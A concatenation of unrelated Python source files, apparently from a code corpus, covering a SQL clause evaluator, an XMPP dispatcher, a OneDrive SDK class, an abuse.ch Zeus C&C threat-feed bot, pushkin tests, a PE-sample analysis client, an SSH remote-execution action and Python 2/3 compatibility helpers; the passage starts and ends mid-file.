            key = parentmapper._columntoproperty[clause].key
        else:
            key = clause.key
        get_corresponding_attr = operator.attrgetter(key)
        return lambda obj: get_corresponding_attr(obj)

    def visit_clauselist(self, clause):
        """Evaluate AND/OR lists with SQL NULL semantics."""
        evaluators = list(map(self.process, clause.clauses))
        if clause.operator is operators.or_:
            def evaluate(obj):
                # OR: any true wins; otherwise NULL if any operand was NULL.
                has_null = False
                for sub_evaluate in evaluators:
                    value = sub_evaluate(obj)
                    if value:
                        return True
                    has_null = has_null or value is None
                if has_null:
                    return None
                return False
        elif clause.operator is operators.and_:
            def evaluate(obj):
                # AND: any false loses; NULL short-circuits to NULL.
                for sub_evaluate in evaluators:
                    value = sub_evaluate(obj)
                    if not value:
                        if value is None:
                            return None
                        return False
                return True
        else:
            raise UnevaluatableError(
                "Cannot evaluate clauselist with operator %s" %
                clause.operator)
        return evaluate

    def visit_binary(self, clause):
        """Evaluate a binary expression; comparisons with NULL yield NULL."""
        eval_left, eval_right = list(map(self.process,
                                         [clause.left, clause.right]))
        operator = clause.operator
        if operator is operators.is_:
            def evaluate(obj):
                return eval_left(obj) == eval_right(obj)
        elif operator is operators.isnot:
            def evaluate(obj):
                return eval_left(obj) != eval_right(obj)
        elif operator in _straight_ops:
            def evaluate(obj):
                left_val = eval_left(obj)
                right_val = eval_right(obj)
                if left_val is None or right_val is None:
                    # SQL semantics: any operation on NULL yields NULL.
                    return None
                # BUGFIX: apply the operator to the operand values already
                # computed above.  The original called eval_left(obj) and
                # eval_right(obj) a second time here, doubling the work and
                # re-running any evaluation side effects.
                return operator(left_val, right_val)
        else:
            raise UnevaluatableError(
                "Cannot evaluate %s with operator %s" %
                (type(clause).__name__, clause.operator))
        return evaluate

    def visit_unary(self, clause):
        """Evaluate NOT; NOT NULL stays NULL."""
        eval_inner = self.process(clause.element)
        if clause.operator is operators.inv:
            def evaluate(obj):
                value = eval_inner(obj)
                if value is None:
                    return None
                return not value
            return evaluate
        raise UnevaluatableError(
            "Cannot evaluate %s with operator %s" %
            (type(clause).__name__, clause.operator))

    def visit_bindparam(self, clause):
        # Capture the bound value once at compile time.
        val = clause.value
        return lambda obj: val
|
data/ImageEngine/gaffer/contrib/ops/convertAnimCache.py
|
import os
import glob
import IECore
class convertAnimCache( IECore.Op ) :
    """Op that converts old-format animation attribute caches (vertCache.*)
    into the new layout (primVar:P / bound entries plus a combined bound)."""

    def __init__( self ) :
        IECore.Op.__init__( self, "Converts animation caches from an old skool format to a nice new one.", IECore.FileSequenceParameter( "result", "" ) )
        self.parameters().addParameters(
            [
                IECore.FileSequenceParameter(
                    "inputSequence",
                    "The animation sequence to convert.",
                    defaultValue = "",
                    allowEmptyString = False,
                    check = IECore.FileSequenceParameter.CheckType.MustExist,
                    extensions = "fio",
                ),
                IECore.FileSequenceParameter(
                    "outputSequence",
                    "The animation sequence to create",
                    defaultValue = "",
                    allowEmptyString = False,
                    extensions = "fio",
                ),
            ],
        )

    def doOperation( self, args ) :
        src = self.parameters()["inputSequence"].getFileSequenceValue()
        dst = self.parameters()["outputSequence"].getFileSequenceValue()
        # If the output sequence gave no frame list, mirror the input's frames.
        if isinstance( dst.frameList, IECore.EmptyFrameList ):
            dst.frameList = src.frameList
        for ( sf, df ) in zip( src.fileNames(), dst.fileNames() ) :
            sc = IECore.AttributeCache( sf, IECore.IndexedIOOpenMode.Read )
            dc = IECore.AttributeCache( df, IECore.IndexedIOOpenMode.Write )
            combinedBound = IECore.Box3f()
            for objectName in sc.objects() :
                # Objects missing either P or a bounding box are skipped.
                p = b = None
                with IECore.IgnoredExceptions( Exception ) :
                    p = sc.read( objectName, "vertCache.P" )
                    b = sc.read( objectName, "vertCache.boundingBox" )
                if p is not None and b is not None :
                    combinedBound.extendBy( b.value )
                    # NOTE(review): entries are written with a leading "-" --
                    # presumably the new cache's naming convention; confirm.
                    dc.write( "-" + objectName, "primVar:P", p )
                    dc.write( "-" + objectName, "bound", b )
            # Union of all per-object bounds for this frame.
            dc.write( "-", "bound", IECore.Box3fData( combinedBound ) )
        return args["outputSequence"].value
# Register the Op with IECore's RunTimeTyped system so cortex tooling can
# discover and instantiate it.
IECore.registerRunTimeTyped( convertAnimCache )
|
data/CouchPotato/CouchPotatoServer/libs/xmpp/dispatcher.py
|
"""
Main xmpppy mechanism. Provides library with methods to assign different handlers
to different XMPP stanzas.
Contains one tunable attribute: DefaultTimeout (25 seconds by default). It defines time that
Dispatcher.SendAndWaitForResponce method will wait for reply stanza before giving up.
"""
import simplexml,time,sys
from protocol import *
from client import PlugIn
# Seconds that SendAndWaitForResponse() waits for a reply before giving up.
DefaultTimeout=25
# Module-global counter used by Dispatcher.send() to mint unique stanza IDs.
ID=0
class Dispatcher(PlugIn):
    """ Ancestor of PlugIn class. Handles XMPP stream, i.e. aware of stream headers.
        Can be plugged out/in to restart these headers (used for SASL f.e.). """
    def __init__(self):
        PlugIn.__init__(self)
        # NOTE(review): DBG_LINE is bound as a local and immediately
        # discarded -- it has no effect on the instance; confirm whether
        # self.DBG_LINE was intended.
        DBG_LINE='dispatcher'
        self.handlers={}
        self._expected={}          # stanza id -> None / stanza / (callback, args)
        self._defaultHandler=None
        self._pendingExceptions=[]
        self._eventHandler=None
        self._cycleHandlers=[]
        # Methods re-exported onto the owner (Client) instance when plugged in.
        self._exported_methods=[self.Process,self.RegisterHandler,self.RegisterDefaultHandler,\
        self.RegisterEventHandler,self.UnregisterCycleHandler,self.RegisterCycleHandler,\
        self.RegisterHandlerOnce,self.UnregisterHandler,self.RegisterProtocol,\
        self.WaitForResponse,self.SendAndWaitForResponse,self.send,self.disconnect,\
        self.SendAndCallForResponse, ]
    def dumpHandlers(self):
        """ Return set of user-registered callbacks in it's internal format.
            Used within the library to carry user handlers set over Dispatcher replugins. """
        return self.handlers
    def restoreHandlers(self,handlers):
        """ Restores user-registered callbacks structure from dump previously obtained via dumpHandlers.
            Used within the library to carry user handlers set over Dispatcher replugins. """
        self.handlers=handlers
    def _init(self):
        """ Registers default namespaces/protocols/handlers. Used internally. """
        self.RegisterNamespace('unknown')
        self.RegisterNamespace(NS_STREAMS)
        self.RegisterNamespace(self._owner.defaultNamespace)
        self.RegisterProtocol('iq',Iq)
        self.RegisterProtocol('presence',Presence)
        self.RegisterProtocol('message',Message)
        self.RegisterDefaultHandler(self.returnStanzaHandler)
        self.RegisterHandler('error',self.streamErrorHandler,xmlns=NS_STREAMS)
    def plugin(self, owner):
        """ Plug the Dispatcher instance into Client class instance and send initial stream header. Used internally."""
        self._init()
        # Capture the owner's original send() before it is shadowed by ours.
        for method in self._old_owners_methods:
            if method.__name__=='send': self._owner_send=method; break
        self._owner.lastErrNode=None
        self._owner.lastErr=None
        self._owner.lastErrCode=None
        self.StreamInit()
    def plugout(self):
        """ Prepares instance to be destructed. """
        self.Stream.dispatch=None
        self.Stream.DEBUG=None
        self.Stream.features=None
        self.Stream.destroy()
    def StreamInit(self):
        """ Send an initial stream header. """
        self.Stream=simplexml.NodeBuilder()
        self.Stream._dispatch_depth=2
        self.Stream.dispatch=self.dispatch
        self.Stream.stream_header_received=self._check_stream_start
        self._owner.debug_flags.append(simplexml.DBG_NODEBUILDER)
        self.Stream.DEBUG=self._owner.DEBUG
        self.Stream.features=None
        self._metastream=Node('stream:stream')
        self._metastream.setNamespace(self._owner.Namespace)
        self._metastream.setAttr('version','1.0')
        self._metastream.setAttr('xmlns:stream',NS_STREAMS)
        self._metastream.setAttr('to',self._owner.Server)
        # Serialise <stream:stream .../> and strip the trailing "/>" so the
        # stream element is sent opened (the "/" removed, ">" re-appended).
        self._owner.send("<?xml version='1.0'?>%s>"%str(self._metastream)[:-2])
    def _check_stream_start(self,ns,tag,attrs):
        # Validate the server's stream header ("<>" is Py2 inequality).
        if ns<>NS_STREAMS or tag<>'stream':
            raise ValueError('Incorrect stream start: (%s,%s). Terminating.'%(tag,ns))
    def Process(self, timeout=0):
        """ Check incoming stream for data waiting. If "timeout" is positive - block for as max. this time.
            Returns:
            1) length of processed data if some data were processed;
            2) '0' string if no data were processed but link is alive;
            3) 0 (zero) if underlying connection is closed.
            Take note that in case of disconnection detect during Process() call
            disconnect handlers are called automatically.
        """
        for handler in self._cycleHandlers: handler(self)
        if len(self._pendingExceptions) > 0:
            # Re-raise an exception captured inside a handler (Py2 three-arg
            # raise preserves the original traceback).
            _pendingException = self._pendingExceptions.pop()
            raise _pendingException[0], _pendingException[1], _pendingException[2]
        if self._owner.Connection.pending_data(timeout):
            try: data=self._owner.Connection.receive()
            except IOError: return
            self.Stream.Parse(data)
            if len(self._pendingExceptions) > 0:
                _pendingException = self._pendingExceptions.pop()
                raise _pendingException[0], _pendingException[1], _pendingException[2]
            if data: return len(data)
        return '0'
    def RegisterNamespace(self,xmlns,order='info'):
        """ Creates internal structures for newly registered namespace.
            You can register handlers for this namespace afterwards. By default one namespace
            already registered (jabber:client or jabber:component:accept depending on context. """
        self.DEBUG('Registering namespace "%s"'%xmlns,order)
        self.handlers[xmlns]={}
        self.RegisterProtocol('unknown',Protocol,xmlns=xmlns)
        self.RegisterProtocol('default',Protocol,xmlns=xmlns)
    def RegisterProtocol(self,tag_name,Proto,xmlns=None,order='info'):
        """ Used to declare some top-level stanza name to dispatcher.
            Needed to start registering handlers for such stanzas.
            Iq, message and presence protocols are registered by default. """
        if not xmlns: xmlns=self._owner.defaultNamespace
        self.DEBUG('Registering protocol "%s" as %s(%s)'%(tag_name,Proto,xmlns), order)
        # NOTE: the builtin "type" is deliberately used as the dict key that
        # holds the stanza class for this tag.
        self.handlers[xmlns][tag_name]={type:Proto, 'default':[]}
    def RegisterNamespaceHandler(self,xmlns,handler,typ='',ns='', makefirst=0, system=0):
        """ Register handler for processing all stanzas for specified namespace. """
        self.RegisterHandler('default', handler, typ, ns, xmlns, makefirst, system)
    def RegisterHandler(self,name,handler,typ='',ns='',xmlns=None, makefirst=0, system=0):
        """Register user callback as stanzas handler of declared type.

        The callback is called with two arguments: the dispatcher instance
        (for replying) and the incoming stanza.  The callback may raise
        xmpp.NodeProcessed just before returning to prevent further
        callbacks from being called with the same stanza and to stop the
        library from returning the stanza to the sender with an error set.

        Arguments:
          "name" - name of stanza. F.e. "iq".
          "handler" - user callback.
          "typ" - value of stanza's "type" attribute. If not specified, any value matches.
          "ns" - namespace of child that stanza must contain.
          "makefirst" - insert handler at the beginning of the handlers list
              instead of adding it to the end.  Note that more common handlers
              (i.e. without "typ" and "ns") will be called first nevertheless.
          "system" - call handler even if a NodeProcessed exception was already raised.
        """
        if not xmlns: xmlns=self._owner.defaultNamespace
        self.DEBUG('Registering handler %s for "%s" type->%s ns->%s(%s)'%(handler,name,typ,ns,xmlns), 'info')
        if not typ and not ns: typ='default'
        if not self.handlers.has_key(xmlns): self.RegisterNamespace(xmlns,'warn')
        if not self.handlers[xmlns].has_key(name): self.RegisterProtocol(name,Protocol,xmlns,'warn')
        if not self.handlers[xmlns][name].has_key(typ+ns): self.handlers[xmlns][name][typ+ns]=[]
        if makefirst: self.handlers[xmlns][name][typ+ns].insert(0,{'func':handler,'system':system})
        else: self.handlers[xmlns][name][typ+ns].append({'func':handler,'system':system})
    def RegisterHandlerOnce(self,name,handler,typ='',ns='',xmlns=None,makefirst=0, system=0):
        """ Unregister handler after first call (not implemented yet). """
        if not xmlns: xmlns=self._owner.defaultNamespace
        self.RegisterHandler(name, handler, typ, ns, xmlns, makefirst, system)
    def UnregisterHandler(self,name,handler,typ='',ns='',xmlns=None):
        """ Unregister handler. "typ" and "ns" must be specified exactly the same as with registering."""
        if not xmlns: xmlns=self._owner.defaultNamespace
        if not self.handlers.has_key(xmlns): return
        if not typ and not ns: typ='default'
        # Locate the registration entry that wraps this callback.
        for pack in self.handlers[xmlns][name][typ+ns]:
            if handler==pack['func']: break
        else: pack=None
        try: self.handlers[xmlns][name][typ+ns].remove(pack)
        except ValueError: pass
    def RegisterDefaultHandler(self,handler):
        """ Specify the handler that will be used if no NodeProcessed exception were raised.
            This is returnStanzaHandler by default. """
        self._defaultHandler=handler
    def RegisterEventHandler(self,handler):
        """ Register handler that will process events. F.e. "FILERECEIVED" event. """
        self._eventHandler=handler
    def returnStanzaHandler(self,conn,stanza):
        """ Return stanza back to the sender with <feature-not-implemennted/> error set. """
        if stanza.getType() in ['get','set']:
            conn.send(Error(stanza,ERR_FEATURE_NOT_IMPLEMENTED))
    def streamErrorHandler(self,conn,error):
        # Map a stream-level <error/> to the matching exception class and raise.
        name,text='error',error.getData()
        for tag in error.getChildren():
            if tag.getNamespace()==NS_XMPP_STREAMS:
                if tag.getName()=='text': text=tag.getData()
                else: name=tag.getName()
        if name in stream_exceptions.keys(): exc=stream_exceptions[name]
        else: exc=StreamError
        raise exc((name,text))
    def RegisterCycleHandler(self,handler):
        """ Register handler that will be called on every Dispatcher.Process() call. """
        if handler not in self._cycleHandlers: self._cycleHandlers.append(handler)
    def UnregisterCycleHandler(self,handler):
        """ Unregister handler that will is called on every Dispatcher.Process() call."""
        if handler in self._cycleHandlers: self._cycleHandlers.remove(handler)
    def Event(self,realm,event,data):
        """ Raise some event. Takes three arguments:
            1) "realm" - scope of event. Usually a namespace.
            2) "event" - the event itself. F.e. "SUCESSFULL SEND".
            3) data that comes along with event. Depends on event."""
        if self._eventHandler: self._eventHandler(realm,event,data)
    def dispatch(self,stanza,session=None,direct=0):
        """ Main procedure that performs XMPP stanza recognition and calling apppropriate handlers for it.
            Called internally. """
        if not session: session=self
        session.Stream._mini_dom=None
        name=stanza.getName()
        if not direct and self._owner._route:
            if name == 'route':
                if stanza.getAttr('error') == None:
                    if len(stanza.getChildren()) == 1:
                        # Unwrap a single routed child and dispatch it instead.
                        stanza = stanza.getChildren()[0]
                        name=stanza.getName()
                    else:
                        for each in stanza.getChildren():
                            self.dispatch(each,session,direct=1)
                        return
            elif name == 'presence':
                return
            elif name in ('features','bind'):
                pass
            else:
                raise UnsupportedStanzaType(name)
        if name=='features': session.Stream.features=stanza
        xmlns=stanza.getNamespace()
        if not self.handlers.has_key(xmlns):
            self.DEBUG("Unknown namespace: " + xmlns,'warn')
            xmlns='unknown'
        if not self.handlers[xmlns].has_key(name):
            self.DEBUG("Unknown stanza: " + name,'warn')
            name='unknown'
        else:
            self.DEBUG("Got %s/%s stanza"%(xmlns,name), 'ok')
        # Promote a bare Node to the Protocol subclass registered for it.
        if stanza.__class__.__name__=='Node': stanza=self.handlers[xmlns][name][type](node=stanza)
        typ=stanza.getType()
        if not typ: typ=''
        stanza.props=stanza.getProperties()
        ID=stanza.getID()
        session.DEBUG("Dispatching %s stanza with type->%s props->%s id->%s"%(name,typ,stanza.props,ID),'ok')
        # Build the handler chain: default handlers first, then type-,
        # property- and type+property-specific ones.
        list=['default']
        if self.handlers[xmlns][name].has_key(typ): list.append(typ)
        for prop in stanza.props:
            if self.handlers[xmlns][name].has_key(prop): list.append(prop)
            if typ and self.handlers[xmlns][name].has_key(typ+prop): list.append(typ+prop)
        chain=self.handlers[xmlns]['default']['default']
        for key in list:
            if key: chain = chain + self.handlers[xmlns][name][key]
        output=''
        if session._expected.has_key(ID):
            user=0
            if type(session._expected[ID])==type(()):
                # A callback was registered for this ID (SendAndCallForResponse).
                cb,args=session._expected[ID]
                session.DEBUG("Expected stanza arrived. Callback %s(%s) found!"%(cb,args),'ok')
                try: cb(session,stanza,**args)
                except Exception, typ:
                    if typ.__class__.__name__<>'NodeProcessed': raise
            else:
                session.DEBUG("Expected stanza arrived!",'ok')
                session._expected[ID]=stanza
        else: user=1
        for handler in chain:
            if user or handler['system']:
                try:
                    handler['func'](session,stanza)
                except Exception, typ:
                    if typ.__class__.__name__<>'NodeProcessed':
                        # Defer the exception so it is re-raised from Process().
                        self._pendingExceptions.insert(0, sys.exc_info())
                        return
                    user=0
        if user and self._defaultHandler: self._defaultHandler(session,stanza)
    def WaitForResponse(self, ID, timeout=DefaultTimeout):
        """ Block and wait until stanza with specific "id" attribute will come.
            If no such stanza is arrived within timeout, return None.
            If operation failed for some reason then owner's attributes
            lastErrNode, lastErr and lastErrCode are set accordingly. """
        self._expected[ID]=None
        has_timed_out=0
        abort_time=time.time() + timeout
        self.DEBUG("Waiting for ID:%s with timeout %s..." % (ID,timeout),'wait')
        while not self._expected[ID]:
            if not self.Process(0.04):
                self._owner.lastErr="Disconnect"
                return None
            if time.time() > abort_time:
                self._owner.lastErr="Timeout"
                return None
        response=self._expected[ID]
        del self._expected[ID]
        if response.getErrorCode():
            # Record error details on the owner for the caller to inspect.
            self._owner.lastErrNode=response
            self._owner.lastErr=response.getError()
            self._owner.lastErrCode=response.getErrorCode()
        return response
    def SendAndWaitForResponse(self, stanza, timeout=DefaultTimeout):
        """ Put stanza on the wire and wait for recipient's response to it. """
        return self.WaitForResponse(self.send(stanza),timeout)
    def SendAndCallForResponse(self, stanza, func, args={}):
        """ Put stanza on the wire and call back when recipient replies.
            Additional callback arguments can be specified in args.

            NOTE(review): the mutable default "args={}" is shared between
            calls; it is only stored/read here, but confirm before mutating.
        """
        self._expected[self.send(stanza)]=(func,args)
    def send(self,stanza):
        """ Serialise stanza and put it on the wire. Assign an unique ID to it before send.
            Returns assigned ID."""
        if type(stanza) in [type(''), type(u'')]: return self._owner_send(stanza)
        if not isinstance(stanza,Protocol): _ID=None
        elif not stanza.getID():
            # Mint a new unique id from the module-global counter
            # (Py2 backquotes are repr()).
            global ID
            ID+=1
            _ID=`ID`
            stanza.setID(_ID)
        else: _ID=stanza.getID()
        if self._owner._registered_name and not stanza.getAttr('from'): stanza.setAttr('from',self._owner._registered_name)
        if self._owner._route and stanza.getName()!='bind':
            # Component routing: wrap the stanza in a <route/> envelope.
            to=self._owner.Server
            if stanza.getTo() and stanza.getTo().getDomain():
                to=stanza.getTo().getDomain()
            frm=stanza.getFrom()
            if frm.getDomain():
                frm=frm.getDomain()
            route=Protocol('route',to=to,frm=frm,payload=[stanza])
            stanza=route
        stanza.setNamespace(self._owner.Namespace)
        stanza.setParent(self._metastream)
        self._owner_send(stanza)
        return _ID
    def disconnect(self):
        """ Send a stream terminator and and handle all incoming stanzas before stream closure. """
        self._owner_send('</stream:stream>')
        while self.Process(1): pass
|
data/OneDrive/onedrive-sdk-python/src/onedrivesdk/request_builder_base.py
|
'''
------------------------------------------------------------------------------
Copyright (c) 2015 Microsoft Corporation
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
------------------------------------------------------------------------------
'''
class RequestBuilderBase(object):
    """Base class for request builders.

    A request builder remembers the URL a request will target and the
    client that will eventually issue it; concrete subclasses build the
    actual request object on demand.
    """

    def __init__(self, request_url, client):
        """Initialize a request builder which returns a request
        when request() is called

        Args:
            request_url (str): The URL to construct the request
                for
            client (:class:`OneDriveClient<onedrivesdk.requests.one_drive_client.OneDriveClient>`):
                The client with which the request will be made
        """
        self._request_url = request_url
        self._client = client

    def append_to_request_url(self, url_segment):
        """Return the request URL with *url_segment* appended after a '/'.

        Args:
            url_segment (str): The segment you would like to append
                to the existing request URL.
        """
        return "/".join((self._request_url, url_segment))
|
data/abusesa/abusehelper/abusehelper/bots/abusech/zeusccbot.py
|
"""
abuse.ch Zeus C&C RSS feed bot.
Maintainer: Lari Huttunen <mit-code@huttu.net>
"""
import re
from abusehelper.core import bot
from . import host_or_ip, resolve_level, split_description, AbuseCHFeedBot
class ZeusCcBot(AbuseCHFeedBot):
    # Feed metadata consumed by the AbuseCHFeedBot base class.
    feed_malware = "zeus"
    feed_type = "c&c"

    feeds = bot.ListParam(default=["https://zeustracker.abuse.ch/rss.php"])

    def parse_title(self, title):
        # Titles look like "<host-or-ip> (<date>)".
        pieces = title.split(None, 1)
        yield host_or_ip(pieces[0])
        if len(pieces) > 1:
            # Strip the surrounding parentheses from the date portion.
            yield "source time", re.sub("[()]", "", pieces[1]) + "Z"

    def parse_description(self, description):
        # Map the feed's key/value pairs to event attributes.
        for key, value in split_description(description):
            if key == "status":
                yield key, value
            elif key == "level":
                yield "description", resolve_level(value)
            elif key == "sbl":
                if value.lower() != "not listed":
                    yield key + " id", value
            elif key == "ip address":
                yield "ip", value

if __name__ == "__main__":
    ZeusCcBot.from_command_line().execute()
|
data/Nordeus/pushkin/pushkin/tests/test_server_json.py
|
import pytest
from pushkin import pushkin_cli
import tornado.web
from pushkin import context
from pushkin.database import database
from pushkin.request.request_processor import RequestProcessor
from pushkin.requesthandlers.events import JsonEventHandler
from pushkin.requesthandlers.notifications import JsonNotificationHandler
from pushkin import test_config_ini_path
from pushkin import config
@pytest.fixture
def setup_database():
    '''Create a fresh test database schema.'''
    database.create_database()
@pytest.fixture
def mock_processor(mocker):
    '''Mock request processor'''
    # Patch submit() so no real processing happens, and silence the logger.
    mocker.patch('pushkin.request.request_processor.RequestProcessor.submit')
    mocker.patch('pushkin.context.main_logger')
@pytest.fixture
def app():
    '''Build the tornado application from the test configuration file.'''
    pushkin_cli.CONFIGURATION_FILENAME = test_config_ini_path
    pushkin_cli.init()
    return pushkin_cli.create_app()
@pytest.fixture
def notification_batch_json():
    ''' Return a valid json notification batch request body '''
    return '''
        {
            "notifications": [
                {
                    "login_id" : 1338,
                    "title" : "Msg title",
                    "content" : "Text of a message",
                    "screen" : "some_screen_id"
                }
            ]
        }
    '''
@pytest.fixture
def post_notification_url(base_url):
    '''Full URL of the JSON notification endpoint.'''
    return base_url + config.json_notification_handler_url
@pytest.fixture
def event_batch_json():
    ''' Return a valid json event batch request body '''
    return '''
        {
            "events": [
                {
                    "user_id" : 123,
                    "event_id" : 1,
                    "timestamp" : 12345,
                    "pairs": {
                        "some_constant" : "6",
                        "world_id" : "1"
                    }
                }
            ]
        }
    '''
@pytest.fixture
def post_event_url(base_url):
    '''Full URL of the JSON event endpoint.'''
    return base_url + config.json_event_handler_url
@pytest.mark.gen_test
@pytest.mark.parametrize("input", [
    (''),
    ('asd'),
])
def test_post_notification_empty_request(setup_database, mock_processor, http_client, post_notification_url, input):
    '''Test that server responds with 400 if invalid parameter is supplied to post_notification request'''
    # NOTE(review): tornado.httpclient is used here but only tornado.web is
    # imported at module level; confirm the submodule is importable.
    request = tornado.httpclient.HTTPRequest(post_notification_url, method='POST', body=input)
    with pytest.raises(tornado.httpclient.HTTPError):
        yield http_client.fetch(request)
    # The malformed body must be rejected before reaching the processor.
    assert not context.request_processor.submit.called
@pytest.mark.gen_test
def test_post_notification(setup_database, mock_processor, http_client, post_notification_url,
                           notification_batch_json):
    '''Test that a valid request is successfully parsed in post_notification'''
    request = tornado.httpclient.HTTPRequest(post_notification_url, method='POST', body=notification_batch_json)
    response = yield http_client.fetch(request)
    assert response.code == 200
    # A valid batch must be handed off to the (mocked) request processor.
    assert context.request_processor.submit.called
@pytest.mark.gen_test
@pytest.mark.parametrize("input", [
    (''),
    ('asd'),
])
def test_post_event_empty_request(setup_database, mock_processor, http_client, post_event_url, input):
    '''Test that server responds with 400 if invalid parameter is supplied to post_event request'''
    request = tornado.httpclient.HTTPRequest(post_event_url, method='POST', body=input)
    with pytest.raises(tornado.httpclient.HTTPError):
        yield http_client.fetch(request)
    # The malformed body must be rejected before reaching the processor.
    assert not context.request_processor.submit.called
@pytest.mark.gen_test
def test_post_event(setup_database, mock_processor, http_client, post_event_url, event_batch_json):
    '''Test that a valid request is successfully parsed in post_event'''
    # submit() returning True means the server accepted the work.
    context.request_processor.submit.return_value = True
    request = tornado.httpclient.HTTPRequest(post_event_url, method='POST', body=event_batch_json)
    response = yield http_client.fetch(request)
    assert response.code == 200
    assert context.request_processor.submit.called
@pytest.mark.gen_test
def test_post_event_service_unavailable(setup_database, mock_processor, http_client, post_event_url, event_batch_json,
                                        app):
    '''Test that service_unavailable is returned if server load is more than expected'''
    context.request_processor.submit.return_value = False
    request = tornado.httpclient.HTTPRequest(post_event_url, method='POST', body=event_batch_json)
    # NOTE(review): this repeats the return_value assignment above through the
    # class attribute; one of the two is probably redundant -- confirm.
    RequestProcessor.submit.return_value = False
    with pytest.raises(tornado.httpclient.HTTPError):
        yield http_client.fetch(request)
|
data/SuperCowPowers/workbench/workbench/clients/pe_peid.py
|
"""This client looks for PEid signatures in PE Files."""
import zerorpc
import os
import pprint
import client_helper
def run():
    """This client looks for PEid signatures in PE Files."""
    args = client_helper.grab_server_args()

    # Connect to the workbench server.
    workbench = zerorpc.Client(timeout=300, heartbeat=60)
    workbench.connect('tcp://' + args['server'] + ':' + args['port'])

    # Take two samples each from the 'bad' and 'good' PE directories.
    here = os.path.dirname(os.path.realpath(__file__))
    file_list = []
    for subdir in ('../data/pe/bad', '../data/pe/good'):
        data_path = os.path.join(here, subdir)
        file_list += [os.path.join(data_path, child) for child in os.listdir(data_path)][:2]

    for filename in file_list:
        # Skip OS X directory metadata files.
        if '.DS_Store' in filename:
            continue
        with open(filename, 'rb') as f:
            # Store the sample, then ask the server for its PEid results.
            md5 = workbench.store_sample(f.read(), os.path.basename(filename), 'exe')
            results = workbench.work_request('pe_peid', md5)
            pprint.pprint(results)
def test():
    """Executes pe_peid test."""
    run()

# Allow running this client directly from the command line.
if __name__ == '__main__':
    run()
|
data/MirantisWorkloadMobility/CloudFerry/cloudferry/lib/os/actions/remote_execution.py
|
from cloudferry.lib.base.action import action
from cloudferry.lib.utils.ssh_util import SshUtil
class RemoteExecution(action.Action):
    """Action that runs a shell command on a remote host over SSH."""

    def __init__(self, cloud, host=None, int_host=None, config_migrate=None):
        # host: the node the SSH utility is bound to;
        # int_host: the host the command is ultimately executed on.
        self.cloud = cloud
        self.host = host
        self.int_host = int_host
        self.config_migrate = config_migrate
        self.remote_exec_obj = SshUtil(self.cloud,
                                       self.config_migrate,
                                       self.host)
        super(RemoteExecution, self).__init__({})

    def run(self, command, **kwargs):
        """Execute *command* on self.int_host; always returns an empty dict."""
        self.remote_exec_obj.execute(command, self.int_host)
        return {}
|
data/RoseOu/flasky/venv/lib/python2.7/site-packages/coverage/backward.py
|
"""Add things to old Pythons so I can pretend they are newer."""
import os, re, sys
# Python 2.3 lacks a builtin `set`; fall back to the old `sets` module.
try:
    set = set
except NameError:
    from sets import Set as set
# `sorted` was added in Python 2.4.
try:
    sorted = sorted
except NameError:
    def sorted(iterable):
        """A 2.3-compatible implementation of `sorted`."""
        lst = list(iterable)
        lst.sort()
        return lst
# `reversed` was added in Python 2.4.
try:
    reversed = reversed
except NameError:
    def reversed(iterable):
        """A 2.3-compatible implementation of `reversed`."""
        lst = list(iterable)
        return lst[::-1]
# str.rpartition was added in Python 2.5.
try:
    "".rpartition
except AttributeError:
    def rpartition(s, sep):
        """Implement s.rpartition(sep) for old Pythons."""
        i = s.rfind(sep)
        if i == -1:
            return ('', '', s)
        else:
            return (s[:i], sep, s[i+len(sep):])
else:
    def rpartition(s, sep):
        """A common interface for new Pythons."""
        return s.rpartition(sep)
# cStringIO exists only on Python 2; Python 3 uses io.StringIO/BytesIO.
try:
    from cStringIO import StringIO
    BytesIO = StringIO
except ImportError:
    from io import StringIO, BytesIO
# `basestring` exists only on Python 2.
try:
    string_class = basestring
except NameError:
    string_class = str
# cPickle is the fast Python 2 pickler; Python 3 has only `pickle`.
try:
    import cPickle as pickle
except ImportError:
    import pickle
# Prefer the lazy `xrange` on Python 2; on 3.x `range` is already lazy.
try:
    range = xrange
except NameError:
    range = range
# iitems(d): iterate a dict's items without copying on Python 2.
try:
    {}.iteritems
except AttributeError:
    def iitems(d):
        """Produce the items from dict `d`."""
        return d.items()
else:
    def iitems(d):
        """Produce the items from dict `d`."""
        return d.iteritems()
# `exec` is a statement on Python 2 and a function on Python 3, so the 2.x
# definition must itself be compiled from a string to keep this module
# importable on both.
if sys.version_info >= (3, 0):
    def exec_code_object(code, global_map):
        """A wrapper around exec()."""
        exec(code, global_map)
else:
    eval(
        compile(
            "def exec_code_object(code, global_map):\n"
            " exec code in global_map\n",
            "<exec_function>", "exec"
        )
    )
# Reading source files: on Python 3, honor PEP 263 encoding declarations.
if sys.version_info >= (3, 0):
    import tokenize
    try:
        open_source = tokenize.open     # tokenize.open was added in 3.2
    except AttributeError:
        from io import TextIOWrapper
        detect_encoding = tokenize.detect_encoding
        def open_source(fname):
            """Open a file in read only mode using the encoding detected by
            detect_encoding().
            """
            buffer = open(fname, 'rb')
            encoding, _ = detect_encoding(buffer.readline)
            # Rewind: detect_encoding consumed the first line(s).
            buffer.seek(0)
            text = TextIOWrapper(buffer, encoding, line_buffering=True)
            text.mode = 'r'
            return text
else:
    def open_source(fname):
        """Open a source file the best way."""
        return open(fname, "rU")
# str/bytes conversion helpers: real conversions on Python 3, no-ops or
# chr/ord loops on Python 2 where str is already a byte string.
if sys.version_info >= (3, 0):
    def to_bytes(s):
        """Convert string `s` to bytes."""
        return s.encode('utf8')
    def to_string(b):
        """Convert bytes `b` to a string."""
        return b.decode('utf8')
    def binary_bytes(byte_values):
        """Produce a byte string with the ints from `byte_values`."""
